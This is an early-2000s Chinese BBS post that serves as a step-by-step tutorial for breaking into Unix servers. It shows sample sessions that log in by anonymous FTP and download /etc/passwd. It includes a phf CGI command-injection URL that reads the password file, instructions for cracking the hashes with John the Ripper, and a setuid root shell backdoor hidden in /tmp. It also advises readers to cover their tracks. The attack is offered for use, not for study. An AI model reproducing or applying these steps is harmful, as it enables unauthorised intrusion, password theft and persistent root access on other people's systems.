发信人: swimmingfish.bbs@bj.()
整理人: snowypeng(2001-08-05 15:14:53), 站内信件
|
一 首先先讲一点Unix的历史
在1968~1969年间,由Bell实验室的Ken Thompson与Dennnis Ritchie, MIT, ...等
想联合发展第一套分时作业系统-MULTICS,但还在发展中Bell认为Multics无法明 示何时
可以到达系统发展的目标,所以在1969年退出.....................
在1970年Ken Thompson以组合语言写了一个作业系统,那就是-Unix.那在197 1年初
Ken Thompson又用了B语言改写Unix,很快的,Dennis Ritchie将B语言改成C语言后 ,在
1973年也以C重写Unix,也就是今日Unix的蓝本............
二 如何Hack ??
Hack server都是用telnet跟ftp两个程式进行....那在那前要会一点unix指令更 好
1 进入主机
2 取得etc/passwd
3 得到系统帐号
4 得到最高权威
三. 开始........
1 如何进入主机?
进入主机的方法有很多,可以用port 23(Telnet), port 25(Sendmail),port 80( http)
现在来实做
Digital UNIX (ms.hinet.net) (ttypa)
login:londonwolf Password: Last login: Mon Dec 2 03:24:00 from 255.255.255.255 londonwolf>telnet hacked.com (用telnet port 23) Trying 1.2.3.4... Connected to hacked.com. Escape character is '^]'. Login:guest Password: Login incorrect Login:root (再一次) Password: Login incorrect 换一个port看看 londonwolf>ftp hacked.com (用ftp 的port) Connected to 1.2.3.4 220 ns.hacked.com FTP server (Version wu-2.4.2-academ[BETA-12](1) Wed Mar 5 1 2:37:21 EST 1997) ready. Name (hacker.com:londonwolf): ftp 331 Password required for hacker. 331 Guest login ok, send your complete e-mail address as password. Password: 230-Welcome, archive user! This is an experimental FTP server. If ha ve any 230-unusual problems, please report them via e-mail to [email protected] 230-If you do have problems, please try using a dash (-) as the first character 230-of your password -- this will turn off the continuation messages t hat may 230-be confusing your ftp client. 230- 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files.
(哇 ! 可以用 anonymous 进来耶!! password 部份输入 a@ 就好了!不要留下足 迹喔!!)
ftp>
这样就进入主机了.........容易弧??
2.如何取得etc/passwd?
你可以用ftp或用telnet or用偷的用骗的用买的全都可以.....
用ftp进入.........
ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. etc pub usr bin lib incoming welcome.msg 226 Transfer complete.
(嗯嗯... 太好了 ! 进来了 !! 下一个目标是.....)
ftp> cd etc 250 CWD command successful. ftp> get passwd (抓回来 !!) 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (566 bytes). 226 Transfer complete. 566 bytes received in 0.56 seconds (0.93 Kbytes/s)
就这幺容易.........
或用你的浏览器抓
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
如果成功,出现的就是etc/passwd档.......快存起来
2.1 介绍抓回来etc/passwd
etc/passwd是一个使用者定义档,它记买著目前系统所有可登买使用者的初始设定 资料.
当使用者要登买时系统就会去跟etc/passwd中的资料对照,正确才能进入,不正确 就不
能进啦!!那下面是一段etc/passwd
root:o.2vTcTnfP65o:0:1:Operator:/:/bin/csh root1:hnrb8TY9./8z.:0:1:Student Supervisor:/:/bin/csh root2:je83sQX/eeewo:0:1:Student Supervisor:/:/bin/csh httpd:*:65533:65533: Nobody:/:/bin/csh nobody:*:65534:1: Nobody:/:/bin/csh daemon:*:1:1::/: sys:*:2:2::/:/bin/csh bin:*:3:3::/bin: uucp:*:4:8::/var/spool/uucppublic: news:*:6:6::/var/spool/news:/bin/csh ingres:*:7:7::/usr/ingres:/bin/csh audit:*:9:9::/etc/security/audit:/bin/csh sync::1:1::/:/bin/sync sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/su ndiag sysadm:QFwz4m5db/Fu6:11:11:local account:/usr/users/sysadm:/bin/csh adm1:X49cvW7MExJnY:100:10:local account-shu:/usr/users/adm1:/bin/csh feya:*7OQkXz1K2h3QM:50000:100:feya test account:/usr/users/feya:/bin/c sh
那现在来解释一下这些东西是甚幺.........
feya:*7OQkXz1K2h3QM:50000:100:feya test account:/usr/users/feya:/bin/c sh
1. 帐号:feya 2. 密码:*7OQkXz1K2h3QM (已编码过了,我会在下面介绍) 3. 使用者的代号:50000 4. group的代号:100 5. 注解:feya test account 6. 他的home目买:/usr/users/feya 7: shell的格式:/bin/csh
如果你拿到shadow的etc/passwd,你就要再得到etc/shadow然后用程式重组..... ..
2.3 甚幺是shadow ??
有的机器为了安全起见,把etc/passwd第二栏的密码部份给拿出来,放到/etc/sha dow中
那etc/passwd是大家都可以读,那etc/shadow只有root可以读,一般使用者读不了 ......
下面show一段有shadow的etc/passwd
root:*:0:1:Operator:/:/bin/csh root1:*:0:1:Student Supervisor:/:/bin/csh root2:*:0:1:Student Supervisor:/:/bin/csh httpd:*:65533:65533: Nobody:/:/bin/csh nobody:*:65534:1: Nobody:/:/bin/csh daemon:*:1:1::/: sys:*:2:2::/:/bin/csh bin:*:3:3::/bin: uucp:*:4:8::/var/spool/uucppublic: news:*:6:6::/var/spool/news:/bin/csh ingres:*:7:7::/usr/ingres:/bin/csh audit:*:9:9::/etc/security/audit:/bin/csh sync::1:1::/:/bin/sync sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/su ndiag sysadm:*:11:11:local account:/usr/users/sysadm:/bin/csh adm1:*:100:10:local account-shu:/usr/users/adm1:/bin/csh feya:*:50000:100:feya test account:/usr/users/feya:/bin/csh
这个跟上面的etc/passwd没甚幺不同,只是密码栏变成*(有的机器是!),那拿到这 个
etc/passwd是没用的......必须要想办法拿到etc/shadow这个档.....
3. 如何得到系统帐号?
要解etc/passwd就要用一些软体...like Jack and John......那本人介绍john !!
John the Ripper v1.4
这个档案可以在本网页中找到........
3.1 使用方法
本人在这只介绍简单的用法......
C:\john passwd -w:word -rule
这就开始找了,passwd档是你抓回来的passwd档,那word是字典档,可以在本网页上 抓取,
那John the Ripper 的详细说明请叁考CoolHC#8.
跑完后再打
C:\john passwd -show
这样他就show出来有多少人的密码被你找到!!有了系统帐号后就准备进入了.... ..
4 得到最高权限
一般用John the Ripper 找出来root密码的机会很少.....所以要用一些系统的漏 洞,
那到那找这些漏洞呢???
请到:
http://161.53.42.3/~crv/security/security.html
http://rootshell.connectnet.com/
那得到最高权威后别忘了留后门喔~ 4.1 BackDoor
比较简单的方法是 suid shell ...
cp /usr/bin/sh /tmp/.cool chmod a+x /tmp/.cool chmod a+s /tmp/.cool
以后无论您是使用甚 account login ,只要一执行 /tmp/.cool 后, suid 就会便成 root ....
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
好了,到现在为止大家应该学会了Hacker应该要懂的东西了.....当然成为一位Ha cker
没这幺容易......所以大家要多学习......那我也不是很厉害,请大家多多指教. ...
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
这篇文章的完成要感谢我的师父飞鹰,我的内容很多都跟他写的CoolHC一样,
你看完本文章后可以去看看CoolHc,那在本站可以取得最新的CoolHc!
-- 铁马冰河入梦来
※ 来源:.网易虚拟社区北京站 http://bj.netease.com.[FROM: 210.72.227.130]
|
|